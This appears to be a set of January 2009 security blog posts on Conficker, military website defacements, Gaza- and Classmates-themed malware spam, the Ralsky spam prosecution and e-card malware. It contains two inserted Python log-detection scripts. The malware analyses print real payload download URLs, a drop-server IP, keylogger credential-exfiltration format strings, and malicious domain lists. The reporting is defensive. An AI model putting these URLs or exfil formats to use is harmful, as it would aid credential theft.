Sunday, January 25, 2009

Dear Santa (or, the American Recovery and Reinvestment Act of 2009)

Dear Santa,

We have been very good. Please send us $825 Billion worth of free stuff.

Sincerely Yours,

Congress


Turn on C-SPAN today and you can see that the above is the level of considered debate and opinion being given to the 625-page American Recovery and Reinvestment Act of 2009.

Still, if we're about to encumber $825 Billion of my children's funds, I thought it would be nice to see what Cyber, CyberCrime, and CyberSecurity Goodies might be waiting under the Christmas Tree.

For starters, we have the "Wireless and Broadband Deployment Grant Programs", established in section 6002 of division B of this Act, which will receive $2,825,000,000, of which $1,000,000,000 shall be for Wireless Deployment Grants and $1,825,000,000 shall be for Broadband Deployment Grants. I'd love to see the project plan and budget spreadsheets that came out to that nice round $1 Billion. (So, how much do we need to provide wireless access for everyone? Hmmm...when we add it all up it comes up to exactly $1 Billion. How convenient!)

Other things under Commerce, Justice and Science that touch on technology:

Commerce


$650,000,000 for the Digital-to-Analog Converter Box Program

$100,000,000 for the National Institute of Standards and Technology for Scientific and Technical Research and Services.

$100,000,000 for "Industrial Technology Services", of which $30,000,000 shall be for Hollings Manufacturing Partnership.

$300,000,000 for "Construction of Research Facilities"

$400,000,000 for the National Oceanic and Atmospheric Administration "for habitat restoration and mitigation activities"

$600,000,000 to NOAA for "accelerating satellite development and acquisition, acquiring climate sensors, and climate modeling capacity, and establishing climate data records."

Justice


$3,000,000,000 for the Edward Byrne Memorial Justice Assistance Grant Program.

$1,000,000,000 for Community Oriented Policing Services

State


$98,527,000 shall be available to the Department of State under the Comprehensive National Cybersecurity Initiative.

Health


$50,000,000 for "Public Health and Social Service Emergency Fund", to include Pandemic influenza preparedness, biomedical advanced research, Project BioShield, and Cyber Security.


Science


$400,000,000 to NASA, of which $250,000,000 shall be solely for accelerating the development of the tier 1 set of Earth science climate research missions.

$2,500,000,000 to the National Science Foundation for "Research and related activities", with $200,000,000 earmarked for research facilities modification.

$400,000,000 more to NSF for "Major Research Equipment and Facilities Construction".

Energy


$18,500,000,000 for "Energy Efficiency and Renewable Energy" programs.

Social Security Administration


$400,000,000 for the construction of a new National Computer Center

Testing of Health Information Technology


Section 4201. NIST - several new programs to develop more advanced health care technology.

Not much analysis here today, just thought these were some aspects of the Stimulus package that might be of interest to the readers here.

Oh - One other Cyber thing - throughout the bill, there is a requirement to document how funds are used by giving updates to the Internet website, "recovery.gov". I have to say that's a nice touch in the first legislation of the year -- here is the website where you MUST INFORM THE AMERICAN PEOPLE.

Monday, January 19, 2009

Downadup / Conficker Worm: 8? 9? 10 Million Infected?

It's been quite a while since we've had a true run-away worm on the Internet, but if the claims of F-Secure are accurate, we've certainly got one on our hands now. At the end of this article I look at which of the domain names calculated by the worm for January 13-16 were ACTUALLY registered. The headlines have been ticking the number of infected machines forward for five days now, all based on F-Secure's successful monitoring of the worm via calculated domain names:

Jan 14 - Researcher: Worm infects 1.1 Million Windows PCs in 24 hours
Jan 15 - 2.5 million PCs infected with Conficker worm
Jan 15 - The Downadup Worm Hits 3.5 Million

Jan 19 - Fast spreading Windows virus already compromised 9 million computers
Jan 19 - Virus affects 10 million computers worldwide

The source for nearly every one of the thousands of media pieces about this worm has been F-Secure. In Friday's blog, they answered the many challenges about their methodology that they have received in their article Calculating the Size of the Downadup Outbreak. Briefly, each worm-infected computer has the ability to calculate a seemingly random domain name where it can receive new updates of the malware. There are as many as 250 possible domain names each day being calculated by the worm. As long as ANY of those domains are still live, the worm will be able to update itself to perform new functions. F-Secure has registered some of these domain names itself, and counts the number of infected computers which contact the domains it controls looking for an update. Each of the infected computers will show its IP address, as well as the number of computers which it claims to have infected itself. In a single day as many as 350,000 unique computers hit the domains controlled by F-Secure. Adding up the number of computers each of these computers claims to have infected -- and some are claiming more than 100 infections each -- is how F-Secure reaches its estimate, which they are calling conservative, knowing that many of the computers are choosing domain names other than their own with which to check in for an update.

The underlying vulnerability used to spread the Conficker worm was addressed by Microsoft with the patch MS08-067 back on October 23, 2008, but the malware has only recently started a true run-away spread.

According to SC Magazine's Dan Kaplan, in his article No end in sight for massive Windows worm outbreak, we haven't seen a worm this big since Nimda back in 2001.

Malware researchers report that the vast majority of the infected computers are on corporate networks, not home computers. There are two reasons for this:

First, as counter-intuitive as this sounds, many corporate networks have disabled the "automatic patching" that many home users have set as their default machine behavior. Because of a need for greater testing in corporate environments, many corporations believe it is acceptable to delay weeks or even months before applying recommended security patches from vendors. Any IT organization that willingly chose NOT to install this patch, after it was issued as a rare "emergency out of cycle patch", seriously needs to investigate whether their security staff needs training in Risk Management. HINT: If Microsoft breaks its Second Tuesday rule to issue a patch, they have performed the risk formula (Risk = Threats x Vulnerabilities x Value of Assets) and determined the Risk Is Very High!

Secondly, this is because the worm scans for a direct connection to the computer, rather than relying on human interaction. Most firewalls will actually block the worm, so the best way of catching it is to have an infected computer ON THE SAME SIDE OF THE FIREWALL as your machine. Because the other primary infection vector is an infected USB drive, employees who shuttle data back and forth to the house on a USB drive are often the Patient Zero for a corporate network outbreak. Once the worm arrives into an organization on an infected thumb drive, if the organization has not patched their machines, EVERY MACHINE IN THE CORPORATION is now an open target.

Because the worm can also spread by learning or guessing the Administrative password on network drives, organizations that allow administrators to connect to every workstation machine on the network using the same administrative password are especially vulnerable. As soon as the worm either guesses or learns via observation the Administrator password, every machine on the network can execute the worm code EVEN IF IT IS PATCHED! The patch prevents the machine from being hacked via the Windows Server RPC vulnerability. It does not prevent an Administrator from logging in to the machine and executing code, which is exactly what the worm does once one of its password attempts succeeds. The Worst Case Scenario? A Domain Administrator visits an infected machine to try to disinfect it, sits down at the keyboard and logs in using his Domain Administrator password. As soon as that occurs, every machine on the network can be quickly compromised.

Computerworld's Gregg Keizer reported on January 15th that 1 in 3 Windows PCs remained vulnerable.

On the second Tuesday in January, the Microsoft Software Removal Tool was updated to be able to remove Conficker. You can follow the exploits of this worm and efforts to remove it at the Microsoft Malware Protection Center Blog and the F-Secure Blog.

A new Support article containing removal tips was released by Microsoft on January 15th: Virus alert about the Win32/Conficker.B worm.

The primary means for the virus to restart itself on an infected machine is the registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost

That key contains many critical Network Services which should be allowed to execute. If infected, the last entry on the list will be a key that was named with a random name generator. The example in Microsoft's article is "axyczbfsetg", but yours will be something different. There are many more steps to manual removal which can be found in the Microsoft support document above (KB 962007).

F-Secure has been posting lists of domain names which are being calculated by DownAdUp. Their most recent list, covering the domains which would have been used over the weekend, contained exactly 1,000 domain names: 250 each for Jan 13, 14, 15, and 16. Rather than list all 1,000, I took the approach of running a WHOIS against each of the 1,000 domains on their list, and recording which ones were actually registered. So, here are the domains which ACTUALLY HAVE BEEN REGISTERED, out of the list of 1,000 potential names.

In all there were 57 domain names which had been registered out of the 1,000.

A tip of the hat to our friends at Georgia Tech, F-Secure, and Shadow Server, for reasons each will understand.

In what could be horrible news for certain domain name owners, five of the domains being automatically calculated on this list belong to actual domain owners. Apparently the malware's random domain calculator can randomly calculate some actual domains. Fortunately, of the domains thus affected only one is an actual company, (a German company, whose logs I would REALLY like to get my hands on!) while the other four seem to have been registered speculatively by domain investors. I've excluded all five from my results.


If any of those sites are in your logs for the past four days, Congratulations, and welcome to Conficker.
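The two checks this post describes, the calculated domain list against your proxy logs and the SvcHost netsvcs entry against a clean baseline, as an added example that is not code from the post, from F-Secure or from Microsoft. The candidate domains, the log lines and the netsvcs baseline are constructed for illustration; the only value taken from the post is the "axyczbfsetg" service name from Microsoft's KB example.

```python
import re
from collections import defaultdict

# Constructed stand-ins for the day's calculated domains: in practice this set
# is the list published by F-Secure, or the registered subset from a WHOIS sweep.
CANDIDATE_DOMAINS = {"qwxzlmnop.info", "ahvbtrde.net"}

# Constructed proxy log lines (timestamp client method url status), not real traffic.
SAMPLE_PROXY_LOG = """\
2009-01-15T08:01:12 10.1.4.22 GET http://www.example.org/index.html 200
2009-01-15T08:01:40 10.1.4.22 GET http://qwxzlmnop.info/search?q=0 404
2009-01-15T08:02:03 10.1.7.9 GET http://www.ahvbtrde.net/ 200
2009-01-15T08:02:05 10.1.7.9 GET http://ahvbtrde.net/update 200
2009-01-15T08:03:17 10.1.4.22 GET http://notqwxzlmnop.info/ 200
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\d{3})$")
HOST_RE = re.compile(r"^https?://([^/:?#\s]+)", re.IGNORECASE)


def host_of(url):
    """Hostname part of a URL, lower-cased, without a trailing dot."""
    m = HOST_RE.match(url)
    return m.group(1).lower().rstrip(".") if m else None


def matching_indicator(host, domains):
    """Exact or subdomain match only: a naive endswith() would let
    'notqwxzlmnop.info' match 'qwxzlmnop.info'."""
    for d in domains:
        if host == d or host.endswith("." + d):
            return d
    return None


def find_dga_contacts(log_text, domains):
    """Map each client IP to the sorted candidate domains it contacted."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # tolerate lines in another format
        _ts, client, _method, url, _status = m.groups()
        host = host_of(url)
        if host is None:
            continue
        d = matching_indicator(host, domains)
        if d:
            hits[client].add(d)
    return {c: sorted(ds) for c, ds in hits.items()}


# Constructed netsvcs list as it would be read from
# HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost,
# with the random name from Microsoft's KB example appended last. The baseline
# is assumed to be taken from a known-clean machine built from the same image.
SAMPLE_NETSVCS = ["AppMgmt", "Browser", "lanmanserver", "Schedule", "wuauserv", "axyczbfsetg"]
BASELINE_NETSVCS = {"AppMgmt", "Browser", "lanmanserver", "Schedule", "wuauserv"}


def unexpected_netsvcs(entries, baseline):
    """Entries not in the baseline; registry names are case-insensitive."""
    known = {b.lower() for b in baseline}
    return [e for e in entries if e.lower() not in known]


if __name__ == "__main__":
    print(find_dga_contacts(SAMPLE_PROXY_LOG, CANDIDATE_DOMAINS))
    print(unexpected_netsvcs(SAMPLE_NETSVCS, BASELINE_NETSVCS))
```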

Thursday, January 08, 2009

US Army hacked as Gaza protest

Today the anti-Israeli hackers for the first time brought their Cyber Propaganda War to Washington DC in the form of their attack against the United States Army's Military District of Washington website, www.mdw.army.mil

The defaced website can still be seen via Google's cache.

What is MDW?

MDW encompasses Fort Myer, Fort McNair, Fort Belvoir, Fort A.P. Hill, Fort Meade, Fort Holabird, Fort Ritchie, the 12th Aviation Battalion at Davison Army Airfield, and Arlington National Cemetery. Its mission is to respond to crisis, disaster, or security requirements in the National Capital Region (NCR), provide base operations support for Army and DoD organizations throughout the NCR, and conduct official ceremonies, locally and worldwide, on behalf of the nation's civilian and military leaders.

According to Zone-H, websites that were hit by the group included:

soa.mdw.army.mil
mdw.army.mil
mdwweb.mdw.army.mil

They also hit the Italian UNICEF website, and the website www.nato-pa.int, the NATO Parliamentary Assembly website in Brussels, Belgium.

In recent months the group also defaced websites belonging to anti-virus vendors Eset and Nod32, as well as Microsoft's websites in Canada, Ireland, and China; Mercedes Benz, Subaru, Mitsubishi, Fiat, Aston Martin, and Shell; Harvard University, Goodyear, the NBA, and other high profile targets.

Although the group is now calling themselves "Peace Crew", the same membership was calling itself "Terrorist Crew" as recently as December.

In addition to the army.mil sites above, Agd_Scorp also defaced the website www.jfhqncr.northcom.mil. On a Turkish language website, the attack is claimed to be an SQL Injection attack against an ASP page on a Microsoft IIS 6.0 webserver.

This is the "Joint Force Headquarters, National Capital Region" of the Northern Command. Prior to the website being taken offline as a result of the hacking, the page read like this:

On Sept. 11, 2001 no one believed the National Capital Region would be a target for those who wish to do us harm. As a nation, we found that to be false. In direct response to the events of that fateful day, JFHQ-NCR was established as the responsible headquarters for land-based homeland defense, defense support to civil authorities and incident management in the national capital region. We have unique skills and are prepared to defend people, territory, critical infrastructures and sovereignty in a supporting role to a lead federal agency.

On a 24/7 basis JFHQ-NCR monitors security requirements; coordinating with the military services, the Department of Homeland Security and local first responders in identifying capabilities the military can provide in case of an emergency or National Special Security Event (NSSE). Once an event is designated, the command becomes a Joint Task Force-National Capital Region (JTF-NCR). JTF-NCR then directs military assistance to federal and civil authorities in safeguarding the nation’s capital.

Gaza Conflict spam points to Fake CNN Infection site

Beginning at 7:30 this morning, the UAB Spam Data Mine began receiving emails claiming to have news about the Gaza conflict from CNN News.



(A typical email)

Each of the many emails we've received points to a website made up to look like a CNN news page.


All of the links on the website are functional, and all really resolve to the real CNN website, with two exceptions. Attempting to play the video will result in the download of malware, and following the Adobe Player button will also result in the download of malware.

During the summer of 2008, one of the most successful spam campaigns of the year also imitated a CNN news story, leading to many home and business computers being infected by a virus.

At this time, many major anti-virus products still do not detect this malware as a virus. According to this Virus Total report only 11 of 38 anti-virus products will trigger on this file as containing a virus. (Follow the link to see if your product does or does not.)

The spam messages refer visitors to one of five different domains, each of which was registered at BizCN.com, a Chinese domain registrar which has been abused by this particular group for many months. Analysis of the malware confirms that this incident has nothing at all to do with the CyberWar being waged by pro- and anti-Israeli hackers. This is instead pure social engineering.

Just as with the many "online banking videos", the "digital certificate malware", the "Fake Bank Merger malware", yesterday's "Classmates.com reunion video", and the fake "Obama acceptance speech", this is a piece of malware which is designed to steal your passwords and send the stolen information to the criminal's server in the Ukraine, which is currently 91.211.65.30.

UAB Student and Malware Analyst, Brian Tanner, examined the Adobe_Player10.exe malware and identified that it causes your computer to download a second piece of malware from http://powerpekin.com/servicepack1.exe. That malware, which has the MD5 of 1f337515a3e96fd317dfb24e9fe67448, was only detected by 2 of 38 products at Virus Total. He then unpacked the servicepack1.exe malware and examined it to determine the stolen data was being sent to 91.211.65.30.

The domains used by this spam include:

downloadplayersnews.com
installflashadobeplaye10.com
newsinstalls.com
startinstalladobe.com

As with yesterday's ClassMates.com incident, the websites are being hosted via Fast Flux hosting, and the same fast flux hosts are being used for phishing as well, currently against MBNA bank and Sparkasse of Germany.

The false registration information provided on the domains claims that an imaginary employee of the BBC (Monnie Moulhem) residing in Spring Hill Florida registered the domains.

The computer which is being used as the "Nameserver" for these malware distribution domains resides at 74.63.217.81 -- which is the same computer which served as the nameserver for yesterday's Classmates.com malware.

While we know that many other subject lines will be used as the campaign progresses, some that we have seen so far include the subject lines:

Gaza emergency - UNICEF
Gaza Groups Report on War
Gaza: Israeli War Crimes?
In what became known as Israel's War of Independence
Israel Assaults Hamas in Gaza
Israel At 'War to the Bitter End,' Strikes Key Hamas...
Israel launches deadly Gaza attacks
Israel Puts War Footage
Israel warns Gaza of impending invasion - Israel-Palestinians ...
Israel: Preparing for War
Israel-Gaza conflict: Tens of thousands in London protest Gaza ...
Israel-Gaza Strip barrier
Israeli war strategy.IDF in urban combat.
Israel's War Crimes
Israels War on Hamas:A Dozen Thoughts
News from Israel,Ynetnews - Israel at War
Now Israel declares 'war to the bitter end' - Middle East, World ...
Religious war in Gaza - Israel Opinion, Ynetnews
The 2007-2008 Israel-Gaza conflict refers to a series of battles between Palestinian militants

Tuesday, January 06, 2009

A New Year and Anti-Virus Products Are Still Losing

One of our most popular blog posts in 2008 was back in August - Anti-Virus Products Still Fail on Fresh Viruses. I'm sad to report that in the New Year the situation is not just bad - it's worse.

My students are back from the holidays, and I couldn't be happier! Tomorrow night I have 14 new graduate students who I'll be meeting in my Computer Security class where I teach at the University of Alabama at Birmingham. But this analysis was by one of my undergraduate research students who works on malware analysis for me.

Although the volume is greatly reduced from Christmas and New Years, we are continuing to see a regular flow of "eCards" into the UAB Spam Data Mine. Today's domain name of choice was "smartcardgreeting.com". The website hasn't changed since what I showed in the January 3rd post - Happy New Year! Here's a Virus! - but the malware is much less detectable.

How bad? Only ONE of thirty-nine products at VirusTotal.com was able to detect this malware as being a bad file.



The other malware he analyzed today was a fake ClassMates.com malware. ClassMates.com has been targeted on and off for most of the month of December with a spam message claiming to have a video for you to review. Of course the video doesn't actually play and instead prompts you to download a program which claims to be an AdobePlayer.

There were actually two separate groups of five domains involved in this attack.

adobflashplayer10.com
installadobereader.com
installcashion.com
newflasplayerforcm.com
newgoodclassmates.com


and

flashplayerforwindows.com
flashsiters.com
installationsflash.com
newsflashbbc.com
windowsflashplayer10.com

The latter group was registered on TodayNic.com, and used the Nameserver NS1.NEWHOSTINGFORUS.COM.

Each of these domains had a page called "reunion2009.htm" which contained the fake video and the malware downloader.



All of the sites were registered with the Chinese domain registrar, BizCN.com, and each used the same nameserver, NS1.AVAILABLEREG.COM.

The first piece of malware, Adobe_Player10.exe, actually has a mediocre detection rate of 16 out of 39 VirusTotal detections. Unfortunately, the only function of this malware is to drop the REAL malware, which is being downloaded from the site:

shangaicons.com/22.exe

22.exe is "double-packed": the hacker takes his virus, packs it with a packer to avoid detection, and then takes the result and packs it with a different packer as well. The result is a very hard to detect piece of malware, as evidenced by the fact that only ONE of 39 anti-virus products was able to detect this one as well.



My student malware analyst was able to successfully unpack the 22.exe malware, and found that it is a root-kitted keylogger, in the same family we've been seeing. It steals passwords from your computer as you type them, and sends them with patterns like this:

C:\Program Files\Internet Explorer\iexplore.exe
http://%s%s?user_id=%.4u&version_id=%s&passphrase=%s&socks=%lu&version=%lu&crc=%.8x
URL: sniffer_ftp_%s
ftp_server=%s&ftp_login=%s&ftp_pass=%s&version=%lu
URL: sniffer_pop3_%s
pop3_server=%s&pop3_login=%s&pop3_pass=%s
URL: sniffer_imap_%s
imap_server=%s&imap_login=%s&imap_pass=%s
URL: sniffer_icq_%s
icq_user=%s&icq_pass=%s

to the Ukrainian IP address:

91.211.65.30

which we first reported seventeen days ago and asked for termination.
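The format strings above are enough to recognise this family's uploads in a web proxy log. As an added example, not code from the post or from UAB, the following turns each printf-style template into a regex and classifies requests by the credential type they carry; the request records, the gate.php path and every credential value are constructed, and only the templates and the 91.211.65.30 address come from the post.

```python
import re
from collections import defaultdict

# The format strings recovered from the unpacked 22.exe, as quoted in the post,
# keyed by the kind of credential each one carries.
EXFIL_TEMPLATES = {
    "checkin": "%s%s?user_id=%.4u&version_id=%s&passphrase=%s&socks=%lu&version=%lu&crc=%.8x",
    "ftp": "ftp_server=%s&ftp_login=%s&ftp_pass=%s&version=%lu",
    "pop3": "pop3_server=%s&pop3_login=%s&pop3_pass=%s",
    "imap": "imap_server=%s&imap_login=%s&imap_pass=%s",
    "icq": "icq_user=%s&icq_pass=%s",
}

# Conversion specifiers that occur in the templates: %s  %.4u  %lu  %.8x
_SPEC = re.compile(r"%\.?\d*l?[sux]")


def template_to_regex(template):
    """Compile a printf-style template into a regex with one capture group per
    conversion. Assumption: stolen fields never contain '&' or whitespace."""
    parts, pos = [], 0
    for m in _SPEC.finditer(template):
        parts.append(re.escape(template[pos:m.start()]))
        conv = m.group(0)[-1]
        if conv == "x":
            parts.append(r"([0-9a-fA-F]+)")   # %.8x: the crc field
        elif conv == "u":
            parts.append(r"(\d+)")            # %.4u / %lu: numeric fields
        else:
            parts.append(r"([^&\s]+)")        # %s: free text up to the next '&'
        pos = m.end()
    parts.append(re.escape(template[pos:]))
    return re.compile("".join(parts))


EXFIL_PATTERNS = {kind: template_to_regex(t) for kind, t in EXFIL_TEMPLATES.items()}


def classify_request(url, body):
    """Return (kind, captured fields) when a request matches an exfil template,
    else None. The check-in rides in the URL; the sniffer_* uploads carry the
    credentials in the request body."""
    for kind, rx in EXFIL_PATTERNS.items():
        m = rx.fullmatch(url if kind == "checkin" else body)
        if m:
            return kind, m.groups()
    return None


def summarize(records):
    """Per client IP, the sorted kinds of credential seen leaving the network."""
    seen = defaultdict(set)
    for client, url, body in records:
        hit = classify_request(url, body)
        if hit:
            seen[client].add(hit[0])
    return {c: sorted(kinds) for c, kinds in seen.items()}


# Constructed request records (client, url, body): the gate.php path and every
# credential value are made up; only the drop-server address is from the post.
SAMPLE_REQUESTS = [
    ("10.1.4.22", "http://91.211.65.30/gate.php?user_id=0042&version_id=7"
                  "&passphrase=abc&socks=1080&version=3&crc=1a2b3c4d", ""),
    ("10.1.4.22", "http://91.211.65.30/sniffer_ftp_0042",
     "ftp_server=ftp.example.org&ftp_login=alice&ftp_pass=hunter2&version=3"),
    ("10.1.7.9", "http://91.211.65.30/sniffer_pop3_0099",
     "pop3_server=mail.example.org&pop3_login=bob&pop3_pass=s3cret"),
    ("10.1.7.9", "http://www.example.org/search?q=pop3_server", ""),  # benign
]

if __name__ == "__main__":
    for client, kinds in summarize(SAMPLE_REQUESTS).items():
        print(client, kinds)
```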

We saw about 375 copies of the ClassMates.com email today, with a wide assortment of subject lines, including:
  • Accomplishments by classmates and reunion information
  • Alumni Events: Classmates
  • An Invitation to Personal Classmates Day
  • Bringing Classmates Together January 2009
  • Classmates - ALUMNI Reunion Calendar
  • Classmates - Calendar 2009
  • Classmates - Custom Invitations
  • Classmates 2009 January - Invitation
  • Classmates Alumni Event Calendar
  • Classmates Day - January 2009.
  • Classmates Important Meeting Information
  • Classmates in January - Invitation to All Faculty to the Spring 2009 ...
  • Classmates in January...Invitation! - Page 1
  • Classmates Institutional Membership Invitation
  • Classmates International Honour Society Invitation Acceptance
  • Classmates invitation - Reunion party Greeting Card.
  • Classmates Membership Invitation
  • Classmates Membership Invitation from teachers
  • Classmates Message Boards
  • Classmates Organisation.Class Reunion Information
  • Classmates Organiser Warning - AN URGENT MESSAGE - Your Classmates Are Waiting
  • Classmates Organiser Warning - Classmates Organisation.Have any special memories from when we were in high school?
  • Classmates Organiser Warning - Don't Miss Tonight's Classmates Reunion !
  • Classmates Organiser Warning - How can someone miss a Classmates meeting?
  • Classmates Organiser Warning - How to Hold A Class Meeting And Promote Classmate Support
  • Classmates Organiser Warning - Meeting high school and junior college classmates
  • Classmates Organiser Warning - Webster meetings among former classmates
  • Classmates Party invitation...
  • Classmates Personal Invitation: Custom invitation
  • Classmates Preview, public invitation
  • Classmates Reunion - Invitation
  • Classmates Reunion - Are you ready to accept the invitation?
  • Classmates Reunion - Classmates Reunion - Special Preview Invitation
  • Classmates Reunion - Custom Invitations
  • Classmates Reunion - Invitation: Ready
  • Classmates Reunion - Personal Invitation Letter to visit Classmates Day
  • Classmates Reunion - Personalized Invitations
  • Classmates Reunion - Ready to view your Classmates Invitation?
  • Classmates Reunion - Your Classmates Invitation - He's Ready, Are You?
  • Classmates Reunion Calendar
  • Classmates Reunion Soon - [Class Reunion] Save the Date
  • Classmates Reunion Soon - All your classmates receiving invitations!
  • Classmates Reunion Soon - classmates meeting
  • Classmates Reunion Soon - Classmates Organisation.What Have You Been Up To
  • Classmates Reunion Soon - ClassMates.com about meeting classmates
  • Classmates Reunion Soon - Important Dates for Classmates Meeting
  • Classmates Reunion Soon - Mini-Reunion / Meeting with Classmates
  • Classmates Reunion Soon - UPDATE: Reunion Date Change
  • Classmates Reunion Soon - Video
  • Classmates Reunion Soon - You Have 1 Message Waiting for You. Classmates portal
  • Classmates Reunion Soon - Your Classmates Are Waiting to meet with you
  • Classmates Reunion Soon - Your classmates Day New Date.
  • Classmates Reunion Soon - Your classmates Day New Date..How can someone miss a Classmates meeting?
  • Classmates Reunion Soon - Your classmates Day New Date.Important Dates for Classmates Meeting
  • Classmates Video your personal invitation by John
  • Classmates/com: HappyScrappers January Invitation
  • Classmates/com: January is the time to learn at a low cost
  • Classmates: Be ready for Reunion Day.
  • Classmates: custom invitations 2009
  • Classmates: Display your invitations from your profile
  • Classmates: Invitation Design 2009
  • Classmates: Membership Invitation - American Studies Association
  • Classmates: Membership Invitation. 2009 season
  • Classmates: View Your Invitation - Click Here
  • Classmates: View your personal invitation video from Chris O'Malley
  • Classmates: Your complete invitation is viewable for 30 days after the event.
  • Classmates: Your Invitation Place
  • Classmates: your invitation to a private view
  • Do not miss the Classmates reunion
  • Do-Not-Miss Classmates reunion.
  • Events Calendar : Classmates
  • Friends waiting for your visit! Classmates
  • Get all of your classmates together Day - January 2009
  • Important Classmates Day's 2009
  • Invitation to the Classmates - January 12th | Earth ...
  • January - Classmates/com
  • January 16, 2009: Deadline for Classmates Invitation
  • January Invitation. Classmates
  • January Invitations, Classmates Invitations, Online ...
  • My Classmates news
  • Reconnect with your MBA classmates and favorite teachers
  • Search for Classmates
  • Spam Accomplishments by classmates and reunion information
  • The power of a personal invitation - Classmates
  • Traditional January Invitations, Classmates Party ...
  • Use Classmates.com to bring class together.
  • Welcome to Classmates Personal Invitation
  • Your Classmates Are Waiting. Classmates Invite all friends.
  • Your Classmates Are Waiting.Look an invitation.
  • Your classmates Day New Date.A Meeting with my HighSchool Classmates
  • Your classmates Day New Date.Important Meeting for Classmates
  • Your classmates Day!
  • Your classmates will be able to find your
  • Your High bring classmates together.



(The previous batch of domains, including "classmatersunion.com, indexguideclassmates.com, renewclassmates.com" all used the nameserver, NS1.GOODNEWYEARHOSTING.COM)

The Classmates malware domains are hosted by Fast Flux, and are using the same Fast Flux network as the current MBNA phishing sites, such as bankcardservices.mbna.co.uk.dlls-id01.eu.

Sunday, January 04, 2009

Whatever happened to Alan Ralsky?

One year ago, the indictment was unsealed against Alan M Ralsky, Scott K Bradley, Judy M Devenow, John S Brown, William C Neil, Anki K Neil, James E Bragg, James E Fite, Peter Severa, How Wai John Hui, Francis A Tribble.

As we review some of the biggest "wins" against spammers, phishers and cyber criminals in 2008, everyone's list starts with Ralsky. On January 3, 2008, the forty page indictment against Alan Ralsky was unsealed. We reported on the indictment in our January 3, 2008 blog entry: Ralsky: Going Down.

But what happened since?

After acknowledging his indictment, on January 9, 2008, Ralsky was released on $50,000 bail.

A notice to appear was issued on January 29, 2008, asking Ralsky and friends to appear before the Honorable Marianne O Battani on March 17, 2008 for a Pretrial Scheduling Conference.

On March 17, 2008 that conference was rescheduled until June 17, 2008.

On June 17, 2008 that conference was rescheduled until October 21, 2008.

Wait! What about the "Speedy Trial Act"? Well . . . there were ELEVEN people indicted originally. As of June 17th, two of the eleven had not appeared before the court to be arraigned. (Peter Severa had not appeared, because he lives in Russia and was never arrested, and for almost exactly the opposite reason, Francis Tribble had not appeared because he was in jail in Los Angeles County and they hadn't transported him yet.) Because of this, the parties involved decided "the 70-day time period under 18 U.S.C. § 3161(c)(1) has not yet commenced."

At the first conference, it was decided that the "lengthy electronic discovery", which had resulted in vast mountains of electronic evidence, had not yet been processed to the point of fully understanding what was at hand. At the second conference, it was "indicated that an additional 120 days would be needed to allow for the extraction and examination of the computer evidence by the defendants."

In other words, the defense was saying, because you have so much evidence against our client, we haven't had time to go through it all yet. (Which is either a stall tactic, or an indication of poor technology, which do you believe? I believe both are probably true.) Oh, and that means:

The parties do therefore agree and stipulate that the period of time from June 17, 2008 through October 28, 2008, shall be excluded from the time computation of the 70-day Speedy Trial period, due to the absence of defendant Tribble, and also due to the need for the parties to effectively manage the extensive electronic discovery presented in this unusual and complex case, because the ends of justice served in taking such action outweighs the best interest of the public and the defendants in a speedy trial, under 18 U.S.C. § 3161(h)(8)(B)(ii).


The following lawyers, all representing the spammers, signed off on that statement:

For Alan Ralsky - Philip Kushner of Kushner & Hamed Co, Cleveland, Ohio
For Scott Bradley - Neil Fink of Birmingham, Michigan
For Judy Devenow - Richard Zuckerman of Honigman Miller Schwartz & Cohn, Detroit
For John Bown - Mark Kriger of LaRene & Kriger, Detroit
For William Neil - Michael Kemnitz, Detroit
For Anki Neil - John McManus, Birmingham, Michigan
For James Fite - Andrew Wise, Federal Defender Office, Detroit
(Peter Severa - not arraigned)
For How Wai John Hui - Avery Mehlman of Herrick, Feinstein, New York
For James Bragg - Robert Morgan of Detroit
For Francis Tribble - Marcia Morrisey

Lawyers for the prosecution:
Terrence Berg, Assistant US Attorney (my favorite AUSA in the whole system)
Thomas Dukes, DOJ Computer Crime and Intellectual Property Section Trial Attorney
Mona Sedky Spivack, CCIPS Trial Attorney

On August 12, 2008 there was a hearing regarding joint representation for Ralsky and Bown (it was denied).

On September 18, 2008 Ralsky's bond conditions were altered to allow him to travel anywhere in the United States as long as he provides prior notification to Pre-Trial Services and the US Attorney's Office.

The October 12, 2008 Pre-Trial conference got rescheduled to November 10, 2008.

At that time, they got down to business, and released the Order to Continue on November 19, 2008. Here's the new gameplan:

Feb 27, 2009: All Discovery must be completed
March 31, 2009: All Pre-Trial Motions are due
April 21, 2009: All Responses to Motions are due
May 12, 2009: Motion Hearing scheduled for 2 PM
May 12, 2009: If no motions, pleas are due at this time

Sep 9, 2009: Jury Trial Begins

For some in the Anti-Spam Community, this seems like a LOOOOOONG time for Justice, especially given that Ralsky is traveling the US as a free man until then.

This concludes our "Whatever happened to Alan Ralsky" status report.

Saturday, January 03, 2009

Happy New Year! Here's a Virus! (New Year's Postcard malware)

I've been busy this week looking at the various defacements (see ComputerWorld, and ABC News) and other cyber attacks (see yesterday's blog) going on against Israel, so I hadn't had a chance to look at my New Years Cards yet!

Sadly, all of my New Years Cards were viruses (although I did get two real Christmas Cards by email.)

The most recent ones I looked at arrived this morning, pointing me to the websites:

bestyearcard.com
youryearcard.com

I decided to see which computers were currently hosting the website "youryearcard.com" and, sure enough, it was hosted with Fast Flux.

24.24.70.135
61.24.107.220
66.178.64.133
67.9.192.176
69.47.115.180
86.200.201.148
88.179.125.249
98.230.55.8
131.113.162.29
160.36.19.235
217.210.150.100
221.214.134.26

were some of the computers which recently hosted this domain name. Next we looked at some of those IPs to see what other domains they had also been hosting:

blackchristmascard.com
cardnewyear.com
decemberchristmas.com
directchristmasgift.com
freechristmasworld.com
freechristmassite.com
freedecember.com
funnychristmasguide.com
holidayxmas.com
itsfatherchristmas.com
livechristmascard.com
newlifeyearsite.com
newyearcardcompany.com
newyearcardfree.com
newyearcardonline.com
superyearcard.com
whitewhitechristmas.com
yourchristmaslights.com
youryearcard.com

All of those sites seem to have been distributing malware pretending to be a card. They are all related to each other, based on the fact that they resolve to the same set of hacked computers (sharing a fast-flux pool of compromised hosts is the usual signature of one operation running many throwaway domains).
